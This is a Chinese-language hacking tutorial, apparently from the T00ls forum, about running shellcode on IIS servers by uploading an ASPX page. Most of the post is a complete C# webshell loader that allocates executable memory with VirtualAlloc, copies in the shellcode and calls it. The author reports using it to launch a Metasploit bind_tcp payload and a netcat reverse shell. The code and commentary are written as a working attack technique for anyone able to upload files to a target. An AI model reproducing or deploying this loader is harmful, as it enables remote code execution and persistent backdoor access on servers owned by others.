利用ASPX执行shellcode

首先说明一下：

这种方法有一定的局限性，并且只有在一些比较特殊的情况下才需要使用。

比如exe文件传不上去、传上去不执行等等。

使用这种方法的环境要求：

服务器支持aspx，并且你能够向服务器上传aspx文件并访问。

1.基本原理
先给服务器上传个aspx文件，内容如下：

01	<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>

02	<%@ Import Namespace="System" %>

03

04	<script runat="server">

05	protected void Page_Load(object sender, EventArgs e)

06

{

07	Response.Write(Hello());

08

}

09	private string Hello()

10

{

11	return "Hello World";

12

}

13

</script>

用.NET做过网站的同学应该比我清楚这些代码的执行原理

简单说就是我在这个页面的前端部分放入了后台代码。

在你访问页面时，会触发Page_Load事件，并调用Hello()这个成员函数,后台代码可以是C#或者VB。

在开发.NET网站的时候，网站源码大都是以xxx.aspx和xxx.aspx.cs（或者xxx.aspx.vb）这种形式组织的。

.cs文件或.vb文件就是对应的后台代码。

通常网站发布后，这些后台代码都被编译成dll文件，所以你是修改不了的，但是前端依然可以插入后台代码。

如果前端和后台都定义了Page_Load事件，微软也有一个默认的规则来控制两者的执行顺序：前端先于后台执行，所以你不用担心写上去的代码不会被执行。

除此之外，直接将xxx.aspx和xxx.aspx.cs这种代码放到网站目录下，它也是可以正常执行的。

我相信你有时候也碰到过这种情况，这时你就可以直接将代码放到cs文件里了，效果是一样的。

上面页面执行结果就是:

既然可以在前端写上后台代码并执行，而后台代码又支持.NET的大部分语法。

那么也就可以利用这一点来执行任何你想要的，

可以用.NET实现的并且权限允许的功能，用C#或VB来写都是可以的。

2.利用方式
利用这一点你可以完成很多工作。

比如执行一条命令，启动一个程序，这就是为什么你会感觉aspx的webshell权限比asp高。

因此利用它来执行shellcode也就不是什么难事。

01	<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>

02	<%@ Import Namespace="System" %>

03	<%@ Import Namespace="System.Runtime.InteropServices" %>

04

05	<script runat="server">

06	delegate int MsfpayloadProc();

07	protected void Page_Load(object sender, EventArgs e)

08

{

09	byte[] codeBytes = { /*你的shellcode*/

10

};

11	IntPtr handle = IntPtr.Zero;

12	handle = VirtualAlloc(

13	IntPtr.Zero,

14	codeBytes.Length,

15	MEM_COMMIT | MEM_RESERVE,

16	PAGE_EXECUTE_READWRITE);

17

try

18

{

19	Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);

20	MsfpayloadProc msfpayload

21	= Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;

22	msfpayload();

23

}

24

finally

25

{

26	VirtualFree(handle, 0, MEM_RELEASE);

27

}

28

}

29

30	//Windows API

31	[DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]

32	public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);

33	[DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]

34	public static extern bool VirtualFree(IntPtr address, int size, uint freeType);

35

//flags

36	const uint MEM_COMMIT = 0x1000;

37	const uint MEM_RESERVE = 0x2000;

38	const uint PAGE_EXECUTE_READWRITE = 0x40;

39	const uint MEM_RELEASE = 0x8000;

40

</script>

上传写好的aspx文件，然后访问，页面会一直显示为加载状态。

我在测试页面里添加的shellcode是一个bind_tcp的msfpayload，监听的是65314端口（随手按的，如有雷同纯属巧合）。

看一下端口开了没有：

再看一下进程：

测试一下能不能上线：

可以看到已经连上了，不过权限依然是Network Service。

这时候，就算你把shellcode.aspx页面关闭了，msfpayload依然在运行，连接还是不会中断的。

当然，重启网站的应用程序池，msfpayload就停止运行了。

3.小结
如果你可以提权，并直接上传和运行exe文件，你可以无视上面的废话，直接跳过本帖。

此外，利用这种方法运行的shellcode，权限跟IIS进程的权限一致。

如果shellcode执行了越权的操作，比如添加管理员，访问页面时连接会被重置，

所以，别指望用它来提权，要是可以别人也早就想到了。

那这么鸡肋的方法到底有什么用呢？你可以自己去发挥，shellcode嘛，我也不是很懂。
我测试用的是win2k3+iis6，欢迎大家在其他环境下测试并反馈意见，包括安装了WAF的环境。

后来找了个反弹shell到nc的shellcode试了一下，也成功了。shellcode是这种格式的：0xfc,0xe8,0x89,0x00。

本文始发于微信公众号（T00ls）：利用ASPX执行shellcode